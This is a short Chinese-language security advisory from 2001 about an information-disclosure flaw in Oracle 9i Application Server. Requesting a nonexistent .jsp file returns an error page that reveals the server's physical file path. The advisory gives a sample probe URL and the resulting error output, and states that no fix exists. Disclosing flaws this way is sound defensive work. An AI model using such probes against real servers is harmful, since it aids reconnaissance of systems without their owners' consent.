Oracle 9i Application Server 存在路径泄露问题发布时间:2001-09-18 更新时间:2001-09-18 严重程度:中 威胁程度:服务器信息泄露 错误类型:设计错误 利用方式:服务器模式 受影响系统 Oracle 9i Application Server详细描述 Oracle 9i Application Server 使用APACHE WEB作为HTTP服务,但是如果请求不存在的.jsp文件,系统的物理路径会被泄露。 测试代码 http://server/Content/Home/anyfile.jsp, 会显示如下信息: <Output begins> JSP Error: -------------------------------------------------------------------------------- Request URI:/Content/Home/Jsp/anyfile.jsp Exception: javax.servlet.ServletException: java.io.FileNotFoundException: d:\oracle\ias\apache\apache\htdocs\company\content\home\jsp\anyfile.jsp (The system cannot find the file specified) -------------------------------------------------------------------------------- <End of output> 解决方案 尚无 相关信息 |
